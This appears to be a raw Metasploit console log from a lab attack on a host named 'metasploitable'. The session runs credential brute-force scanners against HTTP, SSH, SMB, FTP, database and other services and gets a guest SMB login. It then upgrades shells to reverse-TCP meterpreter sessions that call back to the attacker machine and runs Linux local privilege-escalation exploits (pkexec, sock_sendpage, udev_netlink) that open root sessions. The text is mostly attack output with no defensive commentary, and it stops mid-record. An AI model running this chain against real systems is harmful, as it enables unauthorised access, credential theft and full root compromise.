auxiliary/scanner/http/http_login Name: HTTP Login Utility Module: auxiliary/scanner/http/http_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: hdm Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- AUTH_URI no The URI to authenticate against (default:auto) BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET) RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing users, one per line VERBOSE false yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module attempts to authenticate to an HTTP service. References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job http://192.168.26.134:80 No URI found that asks for HTTP authentication Scanned 1 of 1 hosts (100% complete) Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. Exploit: auxiliary/scanner/vnc/vnc_login Name: VNC Authentication Scanner Module: auxiliary/scanner/vnc/vnc_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: carstein jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no The password to test PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 5900 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method. References: http://cvedetails.com/cve/1999-0506/ Auxiliary module running as background job 192.168.26.134:5900 - 192.168.26.134:5900 - Starting VNC login sweep Exploit: auxiliary/scanner/postgres/postgres_login Name: PostgreSQL Login Utility Module: auxiliary/scanner/postgres/postgres_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing users, one per line VERBOSE false yes Whether to print output for all attempts Description: This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes. References: http://www.postgresql.org http://cvedetails.com/cve/1999-0502/ https://hashcat.net/forum/archive/index.php?thread-4148.html Auxiliary module running as background job Exploit: auxiliary/scanner/mysql/mysql_login Name: MySQL Login Utility Module: auxiliary/scanner/mysql/mysql_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: Bernardo Damele A. G. Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 3306 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module simply queries the MySQL instance for a specific user/pass (default is root with blank). References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Exploit: auxiliary/scanner/ftp/ftp_login Name: FTP Authentication Scanner Module: auxiliary/scanner/ftp/ftp_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RECORD_GUEST false no Record anonymous/guest logins to the database RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 21 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:21 - 192.168.26.134:21 - Starting FTP login sweep Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. Exploit: auxiliary/scanner/rservices/rlogin_login Name: rlogin Authentication Scanner Module: auxiliary/scanner/rservices/rlogin_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list FROMUSER no The username to login from FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt no File containing from usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 513 yes The target port SPEED 9600 yes The terminal speed desired STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TERM vt100 yes The terminal type desired THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. 192.168.26.134:513 - 192.168.26.134:513 - Starting rlogin sweep Exploit: auxiliary/scanner/smb/smb_login Name: SMB Login Check Scanner Module: auxiliary/scanner/smb/smb_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: tebo Ben Campbell Brandon McCann "zeknox" Tom Sellers Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line PRESERVE_DOMAINS true no Respect a username that contains a domain name. Proxies no A proxy chain of format type:host:port[,type:host:port][...] RECORD_GUEST false no Record guest-privileged random logins to the database RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cvedetails.com/cve/1999-0506/ Auxiliary module running as background job Exploit: auxiliary/scanner/tftp/tftpbrute Name: TFTP Brute Forcer Module: auxiliary/scanner/tftp/tftpbrute License: BSD License Rank: Normal Provided by: antoine Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address DICTIONARY /usr/share/metasploit-framework/data/wordlists/tftp.txt yes The list of filenames RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 69 yes The target port THREADS 1 yes The number of concurrent threads Description: This module uses a dictionary to brute force valid TFTP image names from a TFTP server. 192.168.26.134:445 - 192.168.26.134:445 SMB - Success: '.\:123456' Guest Auxiliary module running as background job Exploit: auxiliary/scanner/dns/dns_amp 192.168.26.134:445 - No active DB -- Credential data will not be saved! Name: DNS Amplification Scanner Module: auxiliary/scanner/dns/dns_amp License: Metasploit Framework License (BSD) Rank: Normal Provided by: xistence Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set DOMAINNAME isc.org yes Domain to use for the DNS request FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process QUERYTYPE ANY yes Query type(A, NS, SOA, MX, TXT, AAAA, RRSIG, DNSKEY, ANY) RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 53 yes The target port SNAPLEN 65535 yes The number of bytes to capture THREADS 10 yes The number of concurrent threads TIMEOUT 500 yes The number of seconds to wait for new data Description: This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplication attack against a third party. Auxiliary module running as background job Sending DNS probes to 192.168.26.134->192.168.26.134 (1 hosts) Sending 67 bytes to each host using the IN ANY isc.org request Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. Exploit: auxiliary/scanner/telnet/telnet_login Name: Telnet Login Check Scanner Module: auxiliary/scanner/telnet/telnet_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: egypt Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 23 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Exploit: auxiliary/scanner/ssh/ssh_login Name: SSH Login Check Scanner Module: auxiliary/scanner/ssh/ssh_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. 192.168.26.134:22 SSH - Starting bruteforce Executing 'post/multi/manage/shell_to_meterpreter' on session(s): ] Upgrading session ID: 1 192.168.26.134:513 - Scanned 1 of 1 hosts (100% complete) Scanned 1 of 1 hosts (100% complete) 192.168.26.134:23 - No active DB -- Credential data will not be saved! No active DB -- Credential data will not be saved! Platform: Linux Upgrade payload: linux/x86/meterpreter/reverse_tcp Starting exploit/multi/handler Started reverse TCP handler on 192.168.26.207:4433 Starting the payload handler... Transfer method: Bourne shell [fallback] Starting transfer... Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Command stager progress: 100.00% (668/668 bytes) Cleaning up handler Meterpreter session 3 opened (192.168.26.207:4433 -> 192.168.26.134:44060) at 2016-05-26 12:33:36 +0100 Executing 'post/multi/manage/shell_to_meterpreter' on session(s): ] Upgrading session ID: 2 Platform: Linux Upgrade payload: linux/x86/meterpreter/reverse_tcp Starting exploit/multi/handler Started reverse TCP handler on 192.168.26.207:4433 Starting the payload handler... Transfer method: Bourne shell [fallback] Starting transfer... Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Command stager progress: 100.00% (668/668 bytes) Cleaning up handler Meterpreter session 4 opened (192.168.26.207:4433 -> 192.168.26.134:44061) at 2016-05-26 12:34:26 +0100 Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell unix 192.168.26.207:4444 -> 192.168.26.134:55144 (192.168.26.134) 2 shell unix 192.168.26.207:4444 -> 192.168.26.134:55146 (192.168.26.134) 3 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4433 -> 192.168.26.134:44060 (192.168.26.134) 4 meterpreter x86/linux 192.168.26.207:4433 -> 192.168.26.134:44061 (192.168.26.134) Select session numbers? Scanned 1 of 1 hosts (100% complete) SESSION => 3 192.168.26.134 - Collecting local exploits for x86/linux... 192.168.26.134 - 6 exploit checks are being tried... 192.168.26.134 - exploit/linux/local/desktop_privilege_escalation 192.168.26.134 - exploit/linux/local/pkexec 192.168.26.134 - exploit/linux/local/sock_sendpage 192.168.26.134 - exploit/linux/local/sophos_wpa_clear_keys 192.168.26.134 - exploit/linux/local/udev_netlink 192.168.26.134 - exploit/linux/local/vmware_mount 192.168.26.134 - exploit/linux/local/desktop_privilege_escalation: The target is not exploitable. 192.168.26.134 - exploit/linux/local/pkexec: This module does not support check. 192.168.26.134 - exploit/linux/local/sock_sendpage: This module does not support check. 192.168.26.134 - exploit/linux/local/sophos_wpa_clear_keys: The target is not exploitable. 192.168.26.134 - exploit/linux/local/udev_netlink: This module does not support check. 192.168.26.134 - exploit/linux/local/vmware_mount: The target is not exploitable. Post module execution completed PostExploit: exploit/linux/local/desktop_privilege_escalation Name: Desktop Linux Password Stealer and Privilege Escalation Module: exploit/linux/local/desktop_privilege_escalation Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2014-08-07 Provided by: Jakob Lell Available targets: Id Name -- ---- 0 Linux x86 1 Linux x86_64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory for storing temporary files on the target system Payload information: Description: This module steals the user password of an administrative user on a desktop Linux system when it is entered for unlocking the screen or for doing administrative actions using PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password. It exploits the design weakness that there is no trusted channel for transferring the password from the keyboard to the actual password verificatition against the shadow file (which is running as root since /etc/shadow is only readable to the root user). Both screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under the current user account to query for the password and then pass it to a setuid-root binary to do the password verification. Therefore, it is possible to inject a password stealer after compromising the user account. Since sudo requires only the user password (and not the root password of the system), stealing the user password of an administrative user directly allows escalating to root privileges. Please note, you have to start a handler as a background job before running this exploit since the exploit will only create a shell when the user actually enters the password (which may be hours after launching the exploit). Using exploit/multi/handler with the option ExitOnSession set to false should do the job. Writing payload executable to '/tmp/szJeEkI.elf' Writing lib file to '/tmp/xbx.so' Restarting processes (screensaver/policykit) The exploit module has finished. However, getting a shell will probably take a while (until the user actually enters the password). Remember to keep a handler running. PostExploit: exploit/linux/local/pkexec Name: Linux PolicyKit Race Condition Privilege Escalation Module: exploit/linux/local/pkexec Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2011-04-01 Provided by: xi4oyu 0a29406d9794e4f9b30b3c5d6702c708 Available targets: Id Name -- ---- 0 Linux x86 1 Linux x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Count 500 yes Number of attempts to win the race condition DEBUG_EXPLOIT false yes Make the exploit executable be verbose about what it's doing ListenerTimeout 60 yes Number of seconds to wait for the exploit SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec. Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10) References: http://cvedetails.com/cve/2011-1485/ https://www.exploit-db.com/exploits/17942 http://www.osvdb.org/72261 Started reverse TCP handler on 192.168.26.207:4444 Writing exploit executable to /tmp/1Ag85utB (4346 bytes) Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Starting the payload handler... Meterpreter session 5 opened (192.168.26.207:4444 -> 192.168.26.134:53178) at 2016-05-26 12:38:10 +0100 > Background session 5? [y/N] PostExploit: exploit/linux/local/sock_sendpage Name: Linux Kernel Sendpage Local Privilege Escalation Module: exploit/linux/local/sock_sendpage Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2009-08-13 Provided by: Tavis Ormandy Julien Tinnes spender rcvalle egypt Available targets: Id Name -- ---- 0 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DEBUG_EXPLOIT false yes Make the exploit executable be verbose about what it's doing SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4 References: http://cvedetails.com/cve/2009-2692/ http://www.osvdb.org/56992 http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html Started reverse TCP handler on 192.168.26.207:4444 Writing exploit executable to /tmp/boX7kHRl (4069 bytes) Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Meterpreter session 6 opened (192.168.26.207:4444 -> 192.168.26.134:53179) at 2016-05-26 12:38:38 +0100 > Background session 6? [y/N] PostExploit: exploit/linux/local/sophos_wpa_clear_keys Name: Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation Module: exploit/linux/local/sophos_wpa_clear_keys Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2013-09-06 Provided by: Francisco Falcon juan vazquez Available targets: Id Name -- ---- 0 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files clear_keys /opt/cma/bin/clear_keys.pl yes Path to the clear_keys.pl vulnerable script Payload information: Description: This module abuses a command injection on the clear_keys.pl perl script, installed with the Sophos Web Protection Appliance, to escalate privileges from the "spiderman" user to "root". This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection Appliance web ui, executed by the "spiderman" user. This module has been tested successfully on Sophos Virtual Web Appliance 3.7.0. References: http://cvedetails.com/cve/2013-4984/ http://www.osvdb.org/97028 http://www.securityfocus.com/bid/62265 http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities Started reverse TCP handler on 192.168.26.207:4444 Checking actual user... Exploit aborted due to failure: no-access: The actual user is "root", you must be "spiderman" to exploit this Exploit completed, but no session was created. PostExploit: exploit/linux/local/udev_netlink Name: Linux udev Netlink Local Privilege Escalation Module: exploit/linux/local/udev_netlink Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2009-04-16 Provided by: kcope Jon Oberheide egypt Available targets: Id Name -- ---- 0 Linux x86 1 Linux x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. References: http://cvedetails.com/cve/2009-1185/ http://www.osvdb.org/53810 http://www.securityfocus.com/bid/34536 Started reverse TCP handler on 192.168.26.207:4444 Attempting to autodetect netlink pid... Meterpreter session, using get_processes to find netlink pid udev pid: 2352 Found netlink pid: 2351 Writing payload executable (155 bytes) to /tmp/THcetTkbAj Writing exploit executable (1879 bytes) to /tmp/EiRNhDoVNp chmod'ing and running it... Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Meterpreter session 7 opened (192.168.26.207:4444 -> 192.168.26.134:53180) at 2016-05-26 12:39:20 +0100 > Background session 7? [y/N] PostExploit: exploit/linux/local/vmware_mount Name: VMWare Setuid vmware-mount Unsafe popen(3) Module: exploit/linux/local/vmware_mount Platform: Linux Privileged: Yes License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2013-08-22 Provided by: Tavis Ormandy egypt Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 3 yes The session to run this module on. WRITABLEDIR /tmp yes A directory where you can write files. Payload information: Description: VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. References: http://cvedetails.com/cve/2013-1662/ http://www.osvdb.org/96588 http://www.securityfocus.com/bid/61966 http://blog.cmpxchg8b.com/2013/08/security-debianisms.html http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit Started reverse TCP handler on 192.168.26.207:4444 Exploit aborted due to failure: not-vulnerable: vmware-mount doesn't exist or is not setuid Exploit completed, but no session was created. PostExploit: exploit/linux/local/pkexec Name: Linux PolicyKit Race Condition Privilege Escalation Module: exploit/linux/local/pkexec Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2011-04-01 Provided by: xi4oyu 0a29406d9794e4f9b30b3c5d6702c708 Available targets: Id Name -- ---- 0 Linux x86 1 Linux x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Count 500 yes Number of attempts to win the race condition DEBUG_EXPLOIT false yes Make the exploit executable be verbose about what it's doing ListenerTimeout 60 yes Number of seconds to wait for the exploit SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec. Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10) References: http://cvedetails.com/cve/2011-1485/ https://www.exploit-db.com/exploits/17942 http://www.osvdb.org/72261 Started reverse TCP handler on 192.168.26.207:4444 Writing exploit executable to /tmp/tkqlVDJv (4346 bytes) Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Starting the payload handler... Meterpreter session 8 opened (192.168.26.207:4444 -> 192.168.26.134:53181) at 2016-05-26 12:40:00 +0100 > Background session 8? [y/N] PostExploit: exploit/linux/local/sock_sendpage Name: Linux Kernel Sendpage Local Privilege Escalation Module: exploit/linux/local/sock_sendpage Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2009-08-13 Provided by: Tavis Ormandy Julien Tinnes spender rcvalle egypt Available targets: Id Name -- ---- 0 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DEBUG_EXPLOIT false yes Make the exploit executable be verbose about what it's doing SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Payload information: Description: The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4 References: http://cvedetails.com/cve/2009-2692/ http://www.osvdb.org/56992 http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html Started reverse TCP handler on 192.168.26.207:4444 Writing exploit executable to /tmp/vBZN3mz3 (4069 bytes) Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Meterpreter session 9 opened (192.168.26.207:4444 -> 192.168.26.134:53182) at 2016-05-26 12:40:28 +0100 > Background session 9? [y/N] PostExploit: exploit/linux/local/udev_netlink Name: Linux udev Netlink Local Privilege Escalation Module: exploit/linux/local/udev_netlink Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2009-04-16 Provided by: kcope Jon Oberheide egypt Available targets: Id Name -- ---- 0 Linux x86 1 